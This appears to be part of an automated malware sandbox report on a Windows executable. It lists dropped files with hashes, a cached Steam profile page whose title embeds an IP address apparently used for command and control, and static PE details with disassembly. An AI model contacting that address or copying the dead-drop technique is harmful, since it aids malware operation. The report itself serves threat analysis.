                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):80880
                                                                                                                                                                                                        Entropy (8bit):6.920480786566406
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199786602107[1].htm

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3035), with CRLF, LF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):34570
                                                                                                                                                                                                        Entropy (8bit):5.400682101941078
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:D5lpqEg8QE2fJoAa1+6u8vAAnTBv++nIjBtPF5zfhkPXo8A5LTBv++nIjBtPF5x+:Nl8Eg8QE2fJoAa1+6u2nTBv++nIjBtPT
                                                                                                                                                                                                        MD5:A005E9FFB7FA2D681B5D816F37C0BBD0
                                                                                                                                                                                                        SHA1:A2153E5EDE885CE50667328E0342D5853FCE4BCB
                                                                                                                                                                                                        SHA-256:93B002E291C4732BA5B57C44AE7B4552DB28744B9D873305D1A35900001C08B9
                                                                                                                                                                                                        SHA-512:88343A48A10C2A776F5E595A2B402F8B54E6E31202CDAF22D106EE9028B072EFB071E9E32B37955D54C7D4D4F7C10F94C7D3F63B9F7247EB7AD6C24A6F7457FA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: g0b4c https://95.217.220.103|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.steamstatic.com/public/shared/css/motiva_sans.css?v=v7XTmVzbLV33&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.steamstatic.com/public/shared/css/buttons.css?v=-WV9f1LdxEjq&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.steamstatic.com/public/shared/css/shared_global.css?v=_CwtgIbuqQ1L&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.steamstatic.com/public/css/globalv2.css?v=dQy8Omh4p9PH&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.steam

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\delays.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:Non-ISO extended-ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1048575
                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:RR0:L0
                                                                                                                                                                                                        MD5:F5D8DBBB5379A360AE6018BCBBD02561
                                                                                                                                                                                                        SHA1:0FDFAB151F769C2BA6E96E5D6C96EC92FE74EC49
                                                                                                                                                                                                        SHA-256:FE0B9992F19270E0BE4F71BF6F8C919D18942176003F626EA8CE32C46D433540
                                                                                                                                                                                                        SHA-512:9A2DCF48D36E3F66DAECC28E5EF95C974AF3B30EA46ADAA7F184FAA3FECE55698D3F19E49A73492C2260622871BA8A8039153C2C665068FC30424F7CB35FA604
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exe

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):979379375
                                                                                                                                                                                                        Entropy (8bit):0.0779250469830207
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                        MD5:5F3AA21F651A11DA515CF7CA559779DE
                                                                                                                                                                                                        SHA1:38C2F8ED6E9AEC63A3F8D1A46ED8880F40373ECD
                                                                                                                                                                                                        SHA-256:F4BAB09FD17EC12C54C539D992B2EAE31F3607046806E9891E3622B9844EFC1C
                                                                                                                                                                                                        SHA-512:7BB446D4C42A8F6B823655C0D554496BC7E3D9FC43D13774EF50019E0802983DC4E910F676EF4B5487C46E1A79C41AD797C7A3AE473CA32A23343FB0DD3AFFA3
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........s.W...W...W...2...K...2...V...2.......2...t...2...p...W...B.......E.......M.......3.......R.......\......V...W...V.......V...RichW...........................PE..L......]..................%...*......;........%...@...........................Q......8B.......................................-......@0..@!...........A...............*.T.....................*.....H.*.@.............%..............................text.....%.......%................. ..`.rdata...M....%..N....%.............@..@.data........0...~..................@....rsrc....@!..@0..B!.................@..@................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Entropy (8bit):6.926421213843795
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                        File name:7ZthFNAqYp.exe
                                                                                                                                                                                                        File size:5'233'152 bytes
                                                                                                                                                                                                        MD5:6733924c670207ed7755dc0fe2286c36
                                                                                                                                                                                                        SHA1:2fea9c1b0c3b0a923232dbcadcfc661bb08031d0
                                                                                                                                                                                                        SHA256:a555018ed03a0b191f64f625b75cebd9f62c194c7b1c1a66b91266f2f1c1b6c4
                                                                                                                                                                                                        SHA512:692d642223ddcff9e75e0d76437fbc760f9a356609fc4c3cccdddbdeb453f2bf04ce8438c3820b4445c320840a28f86215da880f1d8fe96dc9f65567e4505e67
                                                                                                                                                                                                        SSDEEP:98304:6o4H5BopFuyJBk7f2lMmojnMH1u/FRrxrjUJMJCG:6oQ5Ba3k7LMH1u/rrxrjUJ0
                                                                                                                                                                                                        TLSH:D2365C30B7D288ADC212A631167BAD208D5A5EF93F38E15F3B4FF6262EB1D475008D56
                                                                                                                                                                                                        File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........s.W...W...W...2...K...2...V...2.......2...t...2...p...W...B.......E.......M.......3.......R.......\.......V...W...V.......V..

                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                        Icon Hash:70e0b0bc9ca8a0d0

                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Entrypoint:0x5e3ba5
                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                        Time Stamp:0x5D0CE2E6 [Fri Jun 21 14:00:06 2019 UTC]
                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                        Import Hash:7fcbcb070324bd39594d1f1d97589c61

                                                                                                                                                                                                        Authenticode Signature

                                                                                                                                                                                                        Signature Valid:
                                                                                                                                                                                                        Signature Issuer:
                                                                                                                                                                                                        Signature Validation Error:
                                                                                                                                                                                                        Error Number:
                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                            Version:
                                                                                                                                                                                                            Thumbprint MD5:
                                                                                                                                                                                                            Thumbprint SHA-1:
                                                                                                                                                                                                            Thumbprint SHA-256:
                                                                                                                                                                                                            Serial:

                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                            call 00007FD7E15AC7ABh
                                                                                                                                                                                                            jmp 00007FD7E15ABD9Ch
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                            mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                            pop ebp
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                            mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                            pop ebp
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            mov ecx, dword ptr [0065ECA0h]
                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                            cmp ecx, 005E3BAFh
                                                                                                                                                                                                            setne al
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            mov ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                                                            mov dword ptr fs:[00000000h], ecx
                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                            pop edi
                                                                                                                                                                                                            pop edi
                                                                                                                                                                                                            pop esi
                                                                                                                                                                                                            pop ebx
                                                                                                                                                                                                            mov esp, ebp
                                                                                                                                                                                                            pop ebp
                                                                                                                                                                                                            push ecx
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            mov ecx, dword ptr [ebp-10h]
                                                                                                                                                                                                            xor ecx, ebp
                                                                                                                                                                                                            call 00007FD7E15AACAAh
                                                                                                                                                                                                            jmp 00007FD7E15ABF40h
                                                                                                                                                                                                            mov ecx, dword ptr [ebp-14h]
                                                                                                                                                                                                            xor ecx, ebp
                                                                                                                                                                                                            call 00007FD7E15AAC99h
                                                                                                                                                                                                            jmp 00007FD7E15ABF2Fh
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            push dword ptr fs:[00000000h]
                                                                                                                                                                                                            lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                            sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                            push esi
                                                                                                                                                                                                            push edi
                                                                                                                                                                                                            mov dword ptr [eax], ebp
                                                                                                                                                                                                            mov ebp, eax
                                                                                                                                                                                                            mov eax, dword ptr [006E4434h]
                                                                                                                                                                                                            xor eax, ebp
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            push dword ptr [ebp-04h]
                                                                                                                                                                                                            mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                            mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            push dword ptr fs:[00000000h]
                                                                                                                                                                                                            lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                            sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                            push esi
                                                                                                                                                                                                            push edi
                                                                                                                                                                                                            mov dword ptr [eax], ebp
                                                                                                                                                                                                            mov ebp, eax
                                                                                                                                                                                                            mov eax, dword ptr [006E4434h]
                                                                                                                                                                                                            xor eax, ebp
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            mov dword ptr [ebp-10h], eax
                                                                                                                                                                                                            push dword ptr [ebp-04h]
                                                                                                                                                                                                            mov dword ptr [ebp-04h], FFFFFFFFh

                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x2dea040x190.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3040000x2140b4.rsrc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x4190000x1ed0.rsrc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x2ac3f00x54.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x2ac4e80x18.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2ac4480x40.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x25e0000xca0.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                            Sections

                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                            .text0x10000x25c6a40x25c800f7c9731f8f6ac09a3dd3ad4f6983787cunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .rdata0x25e0000x84dce0x84e000bede94238da379df5062e0ab65b4108False0.33674778045625586OpenPGP Public Key5.360758117639112IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .data0x2e30000x205840x7e00d9f8dd1eedd356b03c4fa5235bc75dc5False0.25536334325396826data4.987820388148724IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .rsrc0x3040000x2140b40x2142002b6ce355c2e13d5b49032536c82763daunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                            Resources

                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                            AFX_DIALOG_LAYOUT0x3052c40x2adataEnglishUnited States0.35714285714285715
                                                                                                                                                                                                            AFX_DIALOG_LAYOUT0x3052f00x2dataEnglishUnited States5.0
                                                                                                                                                                                                            AFX_DIALOG_LAYOUT0x3052f40x2dataEnglishUnited States5.0
                                                                                                                                                                                                            AFX_DIALOG_LAYOUT0x3052f80x2dataEnglishUnited States5.0
                                                                                                                                                                                                            RT_CURSOR0x3052fc0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4805194805194805
                                                                                                                                                                                                            RT_CURSOR0x3054300xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"EnglishUnited States0.7
                                                                                                                                                                                                            RT_CURSOR0x3054e40x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.36363636363636365
                                                                                                                                                                                                            RT_CURSOR0x3056180x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.35714285714285715
                                                                                                                                                                                                            RT_CURSOR0x30574c0x134dataEnglishUnited States0.37337662337662336
                                                                                                                                                                                                            RT_CURSOR0x3058800x134dataEnglishUnited States0.37662337662337664
                                                                                                                                                                                                            RT_CURSOR0x3059b40x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                                                                                                                                            RT_CURSOR0x305ae80x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.37662337662337664
                                                                                                                                                                                                            RT_CURSOR0x305c1c0x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                                                                                                                                            RT_CURSOR0x305d500x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                                                            RT_CURSOR0x305e840x134dataEnglishUnited States0.44155844155844154
                                                                                                                                                                                                            RT_CURSOR0x305fb80x134dataEnglishUnited States0.4155844155844156
                                                                                                                                                                                                            RT_CURSOR0x3060ec0x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.5422077922077922
                                                                                                                                                                                                            RT_CURSOR0x3062200x134dataEnglishUnited States0.2662337662337662
                                                                                                                                                                                                            RT_CURSOR0x3063540x134dataEnglishUnited States0.2824675324675325
                                                                                                                                                                                                            RT_CURSOR0x3064880x134dataEnglishUnited States0.3246753246753247
                                                                                                                                                                                                            RT_BITMAP0x3065bc0x22d8Device independent bitmap graphic, 80 x 37 x 24, image size 8880, resolution 3780 x 3780 px/mEnglishUnited States0.06143497757847534
                                                                                                                                                                                                            RT_BITMAP0x3088940x11a28Device independent bitmap graphic, 512 x 47 x 24, image size 72192EnglishUnited States0.12270184959574704
                                                                                                                                                                                                            RT_BITMAP0x31a2bc0xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80EnglishUnited States0.44565217391304346
                                                                                                                                                                                                            RT_BITMAP0x31a3740x144Device independent bitmap graphic, 33 x 11 x 4, image size 220EnglishUnited States0.37962962962962965
                                                                                                                                                                                                            RT_ICON0x31a4b80x528Device independent bitmap graphic, 16 x 32 x 32, image size 1280EnglishUnited States0.33484848484848484
                                                                                                                                                                                                            RT_ICON0x31a9e00x1428Device independent bitmap graphic, 32 x 64 x 32, image size 5120EnglishUnited States0.1682170542635659
                                                                                                                                                                                                            RT_ICON0x31be080x2d28Device independent bitmap graphic, 48 x 96 x 32, image size 11520EnglishUnited States0.1139273356401384
                                                                                                                                                                                                            RT_ICON0x31eb300x38e2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9945062491416015
                                                                                                                                                                                                            RT_ICON0x3224140x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.5484104046242775
                                                                                                                                                                                                            RT_ICON0x32297c0x748Device independent bitmap graphic, 24 x 48 x 24, image size 0EnglishUnited States0.5187768240343348
                                                                                                                                                                                                            RT_ICON0x3230c40xca8Device independent bitmap graphic, 32 x 64 x 24, image size 0EnglishUnited States0.4382716049382716
                                                                                                                                                                                                            RT_ICON0x323d6c0x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 0EnglishUnited States0.3436477644492912
                                                                                                                                                                                                            RT_ICON0x325a140x3228Device independent bitmap graphic, 64 x 128 x 24, image size 0EnglishUnited States0.27920560747663553
                                                                                                                                                                                                            RT_ICON0x328c3c0xc828Device independent bitmap graphic, 128 x 256 x 24, image size 0EnglishUnited States0.16272443403590944
                                                                                                                                                                                                            RT_ICON0x3354640x32028Device independent bitmap graphic, 256 x 512 x 24, image size 0EnglishUnited States0.08917691857059168
                                                                                                                                                                                                            RT_ICON0x36748c0xc8028Device independent bitmap graphic, 512 x 1024 x 24, image size 0EnglishUnited States0.028426346369806163
                                                                                                                                                                                                            RT_MENU0x42f4b40x196dataEnglishUnited States0.5295566502463054
                                                                                                                                                                                                            RT_DIALOG0x42f64c0x19cdataEnglishUnited States0.5728155339805825
                                                                                                                                                                                                            RT_DIALOG0x42f7e80x14c0dataEnglishUnited States0.2321159638554217
                                                                                                                                                                                                            RT_DIALOG0x430ca80x110dataEnglishUnited States0.6066176470588235
                                                                                                                                                                                                            RT_DIALOG0x430db80x254dataEnglishUnited States0.48825503355704697
                                                                                                                                                                                                            RT_DIALOG0x43100c0xe8dataEnglishUnited States0.6336206896551724
                                                                                                                                                                                                            RT_DIALOG0x4310f40x34dataEnglishUnited States0.9038461538461539
                                                                                                                                                                                                            RT_STRING0x4311280xeedataEnglishUnited States0.4327731092436975
                                                                                                                                                                                                            RT_STRING0x4312180x7cMatlab v4 mat-file (little endian) , numeric, rows 0, columns 0EnglishUnited States0.5806451612903226
                                                                                                                                                                                                            RT_STRING0x4312940x6adataEnglishUnited States0.7264150943396226
                                                                                                                                                                                                            RT_STRING0x4313000x192dataEnglishUnited States0.40298507462686567
                                                                                                                                                                                                            RT_STRING0x4314940x260dataEnglishUnited States0.0805921052631579
                                                                                                                                                                                                            RT_STRING0x4316f40x228dataEnglishUnited States0.43478260869565216
                                                                                                                                                                                                            RT_STRING0x43191c0x1b4dataEnglishUnited States0.3761467889908257
                                                                                                                                                                                                            RT_STRING0x431ad00x86dataEnglishUnited States0.6567164179104478
                                                                                                                                                                                                            RT_STRING0x431b580x82StarOffice Gallery theme p, 536899072 objects, 1st nEnglishUnited States0.7153846153846154
                                                                                                                                                                                                            RT_STRING0x431bdc0x2adataEnglishUnited States0.5476190476190477
                                                                                                                                                                                                            RT_STRING0x431c080x184dataEnglishUnited States0.48711340206185566
                                                                                                                                                                                                            RT_STRING0x431d8c0x4eedataEnglishUnited States0.375594294770206
                                                                                                                                                                                                            RT_STRING0x43227c0x264dataEnglishUnited States0.3333333333333333
                                                                                                                                                                                                            RT_STRING0x4324e00x2dadataEnglishUnited States0.3698630136986301
                                                                                                                                                                                                            RT_STRING0x4327bc0x8adataEnglishUnited States0.6594202898550725
                                                                                                                                                                                                            RT_STRING0x4328480xacdataEnglishUnited States0.45348837209302323
                                                                                                                                                                                                            RT_STRING0x4328f40xdedataEnglishUnited States0.536036036036036
                                                                                                                                                                                                            RT_STRING0x4329d40x4a8dataEnglishUnited States0.3221476510067114
                                                                                                                                                                                                            RT_STRING0x432e7c0x228dataEnglishUnited States0.4003623188405797
                                                                                                                                                                                                            RT_STRING0x4330a40x2cdataEnglishUnited States0.5227272727272727
                                                                                                                                                                                                            RT_STRING0x4330d00x53edataEnglishUnited States0.2965722801788376
                                                                                                                                                                                                            RT_ACCELERATOR0x4336100x28dataEnglishUnited States0.975
                                                                                                                                                                                                            RT_GROUP_CURSOR0x4336380x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                                            RT_GROUP_CURSOR0x43365c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_CURSOR0x4336700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_CURSOR0x4336840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_CURSOR0x4336980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_CURSOR0x4336ac0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_CURSOR0x4336c00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_CURSOR0x4336d40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                            RT_GROUP_CURSOR0x4336e80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_CURSOR0x4336fc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_CURSOR0x4337100x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_CURSOR0x4337240x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_CURSOR0x4337380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_CURSOR0x43374c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_CURSOR0x4337600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_ICON0x4337740x3edataEnglishUnited States0.7903225806451613
                                                                                                                                                                                                            RT_GROUP_ICON0x4337b40x76dataEnglishUnited States0.711864406779661
                                                                                                                                                                                                            RT_VERSION0x43382c0x33cdataEnglishUnited States0.4227053140096618
                                                                                                                                                                                                            RT_DLGINCLUDE0x433b680x60236PC bitmap, Windows 3.x format, 49522 x 2 x 49, image size 393844, cbSize 393782, bits offset 540.7211172679299714
                                                                                                                                                                                                            RT_ANIICON0x493da00xe160PC bitmap, Windows 3.x format, 7348 x 2 x 37, image size 58483, cbSize 57696, bits offset 540.3879645036051026
                                                                                                                                                                                                            RT_ANIICON0x4a1f000x9659PC bitmap, Windows 3.x format, 5424 x 2 x 35, image size 38738, cbSize 38489, bits offset 540.37800410506898074
                                                                                                                                                                                                            RT_ANIICON0x4ab55c0xb5dbPC bitmap, Windows 3.x format, 6682 x 2 x 54, image size 46685, cbSize 46555, bits offset 540.36421437009988183
                                                                                                                                                                                                            RT_ANIICON0x4b6b380x32888PC bitmap, Windows 3.x format, 26553 x 2 x 44, image size 207353, cbSize 206984, bits offset 540.495371622927376
                                                                                                                                                                                                            RT_ANIICON0x4e93c00x2e8bbPC bitmap, Windows 3.x format, 24253 x 2 x 36, image size 190909, cbSize 190651, bits offset 540.4829085606684465
                                                                                                                                                                                                            None0x517c7c0x437DOS executable (COM)EnglishUnited States0.2632066728452271

                                                                                                                                                                                                            Imports

                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                            VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
